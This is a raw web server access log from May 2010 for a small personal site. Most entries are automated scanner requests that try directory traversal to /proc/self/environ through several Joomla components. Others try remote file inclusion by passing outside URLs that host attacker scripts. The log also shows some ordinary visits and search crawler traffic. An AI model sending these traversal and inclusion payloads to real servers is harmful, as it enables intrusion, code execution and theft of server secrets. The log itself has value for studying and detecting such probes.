94.198.96.3 - - [30/May/2010:08:44:28 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:08:44:29 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
67.18.167.170 - - [30/May/2010:08:44:33 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:08:44:33 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:08:44:47 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:08:44:47 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:08:44:47 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
94.198.96.3 - - [30/May/2010:08:45:49 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
209.216.201.8 - - [30/May/2010:08:45:57 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
67.18.167.170 - - [30/May/2010:08:46:03 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
218.146.255.196 - - [30/May/2010:08:46:30 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.146.255.196 - - [30/May/2010:08:46:30 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.146.255.196 - - [30/May/2010:08:46:31 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
65.55.51.111 - - [30/May/2010:08:47:32 -0500] "GET /logs/access_log.1166659200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.211.18.156 - - [30/May/2010:08:49:31 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.55.43.66 - - [30/May/2010:08:49:39 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:08:50:08 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:08:50:09 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:08:50:09 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
94.198.96.3 - - [30/May/2010:08:50:51 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:08:50:51 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:08:50:51 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
209.216.201.8 - - [30/May/2010:08:52:31 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:08:52:31 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:08:52:31 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
67.18.167.170 - - [30/May/2010:08:52:37 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:08:52:37 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:08:52:38 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
218.146.255.196 - - [30/May/2010:08:52:48 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.146.255.196 - - [30/May/2010:08:52:48 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.146.255.196 - - [30/May/2010:08:52:48 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.214.25.33 - - [30/May/2010:08:53:16 -0500] "GET /logs//component//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-""libwww-perl/5.805"
85.214.25.33 - - [30/May/2010:08:53:16 -0500] "GET //component//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-""libwww-perl/5.805"
218.146.255.196 - - [30/May/2010:08:54:11 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.106.71 - - [30/May/2010:08:55:52 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
69.94.106.71 - - [30/May/2010:08:55:52 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.94.106.71 - - [30/May/2010:08:55:52 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.142.68.135 - - [30/May/2010:08:56:32 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.68.135 - - [30/May/2010:08:56:32 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.68.135 - - [30/May/2010:08:56:32 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
207.46.204.185 - - [30/May/2010:08:57:27 -0500] "GET /logs/access_log.1197849600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.211.18.156 - - [30/May/2010:08:57:30 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
95.211.18.156 - - [30/May/2010:08:57:30 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
125.160.202.66 - - [30/May/2010:08:58:06 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://id.wikipedia.org/wiki/Kostum""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
125.160.202.66 - - [30/May/2010:08:58:06 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
125.160.202.66 - - [30/May/2010:08:58:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
95.211.18.156 - - [30/May/2010:08:58:37 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.55.43.66 - - [30/May/2010:08:59:00 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
218.146.255.196 - - [30/May/2010:09:01:38 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.88.4.141 - - [30/May/2010:09:04:38 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
121.88.4.141 - - [30/May/2010:09:04:39 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
121.88.4.141 - - [30/May/2010:09:04:39 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
121.88.4.141 - - [30/May/2010:09:04:41 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
121.88.4.141 - - [30/May/2010:09:04:42 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
121.88.4.141 - - [30/May/2010:09:04:43 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
58.230.162.220 - - [30/May/2010:09:05:20 -0500] "GET /logs/access_log.1270512000///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:05:20 -0500] "GET /logs///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 7549 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:05:20 -0500] "GET ///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
95.211.18.156 - - [30/May/2010:09:05:40 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
95.211.18.156 - - [30/May/2010:09:05:40 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
95.211.18.156 - - [30/May/2010:09:05:41 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.195.112.180 - - [30/May/2010:09:06:07 -0500] "GET /logs/access_log.1198022400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.55.43.66 - - [30/May/2010:09:06:21 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [30/May/2010:09:06:22 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [30/May/2010:09:06:22 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.195.112.180 - - [30/May/2010:09:07:13 -0500] "GET /logs/access_log.1214870400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.211.18.156 - - [30/May/2010:09:08:09 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
95.211.18.156 - - [30/May/2010:09:08:09 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
95.211.18.156 - - [30/May/2010:09:08:09 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
58.230.162.220 - - [30/May/2010:09:08:35 -0500] "GET /logs/access_log.1270857600///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.55.43.66 - - [30/May/2010:09:08:58 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [30/May/2010:09:08:58 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [30/May/2010:09:08:58 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
69.94.106.71 - - [30/May/2010:09:11:39 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
69.94.106.71 - - [30/May/2010:09:11:39 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.94.106.71 - - [30/May/2010:09:11:39 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
218.146.255.196 - - [30/May/2010:09:11:46 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.146.255.196 - - [30/May/2010:09:11:46 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.146.255.196 - - [30/May/2010:09:11:46 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
174.142.68.135 - - [30/May/2010:09:11:51 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.68.135 - - [30/May/2010:09:11:51 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.68.135 - - [30/May/2010:09:11:51 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.124.198.60 - - [30/May/2010:09:11:56 -0500] "GET /send_reminders.php?includedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:09:11:56 -0500] "GET /logs/send_reminders.php?includedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
74.124.198.60 - - [30/May/2010:09:11:56 -0500] "GET /logs/access_log.1271548800/send_reminders.php?includedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.214.25.33 - - [30/May/2010:09:12:58 -0500] "GET /logs/*?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
85.214.25.33 - - [30/May/2010:09:12:58 -0500] "GET /*?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.805"
91.121.145.89 - - [30/May/2010:09:13:06 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.145.89 - - [30/May/2010:09:13:07 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:09:13:25 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:09:13:25 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
72.18.137.210 - - [30/May/2010:09:14:53 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gargaso.co.kr/php-bin//bbs/data/kj/id1.pdf?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:09:14:53 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gargaso.co.kr/php-bin//bbs/data/kj/id1.pdf?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:09:14:53 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gargaso.co.kr/php-bin//bbs/data/kj/id1.pdf?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:09:17:56 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gargaso.co.kr/php-bin//bbs/data/kj/id1.pdf?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:09:17:56 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gargaso.co.kr/php-bin//bbs/data/kj/id1.pdf?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:09:17:56 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gargaso.co.kr/php-bin//bbs/data/kj/id1.pdf?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:18:16 -0500] "GET ///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:18:16 -0500] "GET /logs///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 7549 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:18:16 -0500] "GET /logs/access_log.1270512000///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:18:21 -0500] "GET ///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:18:21 -0500] "GET /logs///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 7549 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:18:22 -0500] "GET /logs/access_log.1270512000///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:18:37 -0500] "GET /logs///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 7549 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:18:37 -0500] "GET ///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:18:37 -0500] "GET /logs/access_log.1270512000///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
218.146.255.196 - - [30/May/2010:09:19:16 -0500] "GET /logs/access_log.1274313600/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.146.255.196 - - [30/May/2010:09:19:16 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.146.255.196 - - [30/May/2010:09:19:17 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.106.71 - - [30/May/2010:09:19:32 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
69.94.106.71 - - [30/May/2010:09:19:32 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.94.106.71 - - [30/May/2010:09:19:32 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.142.68.135 - - [30/May/2010:09:19:33 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.142.68.135 - - [30/May/2010:09:19:33 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.68.135 - - [30/May/2010:09:19:33 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
85.15.78.119 - - [30/May/2010:09:21:15 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:21:16 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:21:18 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
58.230.162.220 - - [30/May/2010:09:21:39 -0500] "GET /logs/access_log.1270857600///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:21:41 -0500] "GET /logs/access_log.1270857600///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [30/May/2010:09:21:48 -0500] "GET /logs/access_log.1270857600///?path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.15.78.119 - - [30/May/2010:09:22:31 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "-""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:31 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:31 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:32 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:32 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:32 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:32 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:32 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:32 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:32 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:32 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:33 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:54 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:54 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:54 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:54 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
85.15.78.119 - - [30/May/2010:09:22:54 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53"
